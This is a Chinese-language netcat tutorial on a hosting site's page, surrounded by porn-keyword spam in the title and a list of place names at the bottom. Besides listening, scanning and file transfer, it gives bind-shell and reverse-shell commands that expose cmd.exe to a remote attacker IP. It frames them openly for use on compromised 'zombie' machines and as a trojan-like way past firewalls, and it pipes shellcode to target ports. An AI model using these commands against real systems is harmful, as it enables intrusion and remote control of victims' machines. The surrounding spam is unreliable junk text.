亚洲激情专区-91九色丨porny丨老师-久久久久久久女国产乱让韩-国产精品午夜小视频观看

溫馨提示×

溫馨提示×

您好,登錄后才能下訂單哦!

密碼登錄×
登錄注冊×
其他方式登錄
點擊 登錄注冊 即表示同意《億速云用戶服務條款》

nc的使用方法

發布時間:2020-10-08 05:22:59 來源:網絡 閱讀:496 作者:b0undless 欄目:安全技術

1)連接到REMOTE主機,例子:  
格式:nc -nvv 192.168.x.x 80  
講解:連到192.168.x.x的TCP80端口  

2)監聽LOCAL主機,例子:  
格式:nc -l -p 80  
講解:監聽本機的TCP80端口  

3)掃描遠程主機,例子:  
格式:nc -nvv -w2 -z 192.168.x.x 80-445  
講解:掃描192.168.x.x的TCP80到TCP445的所有端口  

4)REMOTE主機綁定SHELL,例子:  
格式:nc -l -p 5354 -t -e c:\winnt\system32\cmd.exe  
講解:綁定REMOTE主機的CMDSHELL在REMOTE主機的TCP5354端口  

5)REMOTE主機綁定SHELL并反向連接,例子:  
格式:nc -t -e c:\winnt\system32\cmd.exe 192.168.x.x 5354  
講解:綁定REMOTE主機的CMDSHELL并反向連接到192.168.x.x的TCP5354端口

6)作***程序用,例子:  
格式1:type.exe c:\exploit.txt|nc -nvv 192.168.x.x 80 格式2:nc-nvv192.168.x.x80
講解:連接到192.168.x.x的80端口,并在其管道中發送'c:\ex ploit.txt'的內容(兩種格式確有相同的效果, 真是有異曲同工之妙:P) 附:'c:\exploit.txt'為shellcode等  

7)作蜜罐用[1],例子:  
格式:nc -L -p 80  
講解:使用'-L'(注意L是大寫)可以不停地監聽某一個端口,直到ctrl+c為止  

8)作蜜罐用[2],例子:  
格式:nc -L -p 80>c:\log.txt  
講解:使用'-L'可以不停地監聽某一個端口,直到ctrl+c為止,同時把結果輸出到'c:\log.txt'中,如果把'& gt;' 改為'>>'即可以追加日志 附:'c:\log.txt'為日志等  

9)作蜜罐用[3],例子:  
格式1:nc -L -p 80  
格式2:type.exe c:\honeypot.txt|nc -L -p 80  
講解:使用'-L'可以不停地監聽某一個端口,直到ctrl+c為止,并把'c:\honeypot.txt'的內容'送'入其管道中

命令1:監聽命令  

nc -l -p port  
nc -l -p port > e:\log.dat  
nc -l -v -p port  

參數解釋:  

-l:監聽端口,監聽入站信息  
-p:后跟本地端口號  
-v:顯示端口的信息,如果使用-vv的話,則會顯示端口更詳細的信息  

提示:一般大家都愛用-vv  

nc -l -p 80  

這個很簡單,監聽80端口  
如果機器上運行這個命令,端口80被認為是開放的,可以欺騙很多掃描器的哦!  

nc -l -p 80 > e:\log.dat  

呵呵,功能和上邊一樣,但是后邊加了個“> e:\log.dat”我想,學過ECHO那個命令的人都會知道吧,是在E盤創建一個log.dat的日志文件  

nc -l -v -p 80  

和上邊命令相似,不過這次不是記錄在文件里,而是會直接顯示在運行著NC的屏幕上。  

呵呵,講了這么多,來實踐下  

nc -l -v -p 80  

然后在瀏覽器中輸入本機IP:127.0.0.1  
呵呵,看到什么?  

同樣,上邊兩個也是一樣,大家自己試驗一下吧

命令2:程序定向  

nc -l -p port -t -e cmd.exe  

本地機: nc -l -p port 或 nc -l -v -p port  
目標機:nc -e cmd.exe ip port  

參數解釋:  

-l、-p兩個參數已經解釋過了  
-e;作用就是程序定向  
-t:以telnet的形式來應答  

例子  

nc -l -p 5277 -t -e cmd.exe  

知道運行在哪里嗎?千萬不要運行在自己的機器上,如果運行了,你機器就會變成一臺TELNET的服務器了,呵呵,解釋一下:監聽本地端口5277的入站信息,同時將CMD.exe這個程序,重定向到端口5277上,當有人連接的時候,就讓程序CMD.exe以TELNET的形式來響應連接要求。  

說白了,其實就是讓他成為一臺TELNET的肉雞,所以這個命令要運行在你的肉雞上。。(話外音:說這么多遍當我們白癡啊,快往下講!!!)  

呵呵,咱們來找臺肉雞試試,我TELNET IP 5277  
HOHO~~如何?  

local machine:nc -l -p port ( or nc -l -v -p port )  
remote machine:nc -e cmd.exe ip port  

大家知道灰鴿子和神偷吧,這兩款工具都是利用了反彈端口型的***,  
什么叫反彈端口?就是說,當對方中馬后,不用你主動和對方連接,也就是說不用從你的client端向對方主機上運行的server端發送請求連接,而是對方主動來連接你這樣就可以使很多防火墻失效,因為很多防火墻都不檢查出站請求的。  


這里這兩個命令結合在一起后,于那兩款***可以說有異曲同工之效。為什么?咳!!聽我給你講啊!!(先交100000000RMB學費)哇,別殺我啊!!)  

nc -l -p 5277 (堅聽本地5277端口)  

同樣也可以用  

nc -l -v -p 5277  

運行在本地然后在遠程機器上,想辦法運行  

nc -e cmd.exe ip 5277  

(你可別真的打“ip”在肉機上啊)要打,xxx.xxx.xxx.xxx這樣!!  

呵呵,看看在本地機器上出現了什么?  

這樣就是反彈~~在本地機器上得到了一個SHELL

命令3:掃描端口  

nc -v ip port  
nc -v -z ip port-port  
nc -v -z -u ip port-port  


參數解釋:  

-z:將輸入輸出關掉,在掃描時使用  

nc -v ip port  

這個命令是針對某一個端口進行掃描  

例如:  

nc -v ip 135  

掃描遠程主機的135端口,這樣獲得了該端口的一些簡單信息,但是針對某些端口,我們還可以獲得更多的信息  

例如:80端口  

我們可以使用nc -v ip 80 然后使用get方法來獲得對方的WEB服務器的信息  

nc -v -z ip port-port  

這個命令是用來掃描的一個命令,這個命令用于快速掃描TCP端口,而port-port則是指定了掃描的端口范圍  

例如:  

nc -v -z ip 1-200  

可以看到我機器上的1-200的TCP端口的開放情況  


nc -v -z -u ip port-port  

這個命令比上個命令多了個-u,這個命令的作用仍然是掃描端口,只是多了一個-u的參數,是用來掃UDP端口的  

例如:  

nc -v -z -u ip 1-200  

這個命令就會掃1-200的UDP端口

命令4:傳送文件(HOHO,I LIKE)  

LOCAL MACHINE:nc -v -n ip port < x:\svr.exe  
REMOTE MACHINE:nc -v -l -p port > y:\svr.exe  

參數解釋:  

-n:指定數字的IP地址  

這兩個命令結合起來是用來傳送文件的  

首先,在遠程機上運行命令:  

nc -v -l -p 5277 > c:\pulist.exe  

這個命令還記的嗎?呵呵,是不是和監聽命令有點類似,對,沒錯,這個是監聽5277端口并把接受到的信息數據寫到c:\pulist.exe中.這時候在本地機上運行  

nc -v -n ip 5277 < e:\hack\pulist.exe  


向AI問一下細節

免責聲明:本站發布的內容(圖片、視頻和文字)以原創、轉載和分享為主,文章觀點不代表本網站立場,如果涉及侵權請聯系站長郵箱:is@yisu.com進行舉報,并提供相關證據,一經查實,將立刻刪除涉嫌侵權內容。

AI

班戈县| 琼结县| 湖南省| 讷河市| 新乡县| 吉水县| 乌拉特后旗| 三明市| 台中县| 文昌市| 曲周县| 鹤峰县| 阿合奇县| 沅江市| 马公市| 新安县| 日喀则市| 梨树县| 海阳市| 驻马店市| 伊吾县| 九台市| 庄河市| 霍邱县| 长岛县| 宝山区| 吉林市| 台安县| 临潭县| 黑水县| 武夷山市| 兴国县| 北票市| 门源| 汪清县| 肃宁县| 康乐县| 福州市| 阿克陶县| 莒南县| 彰化市|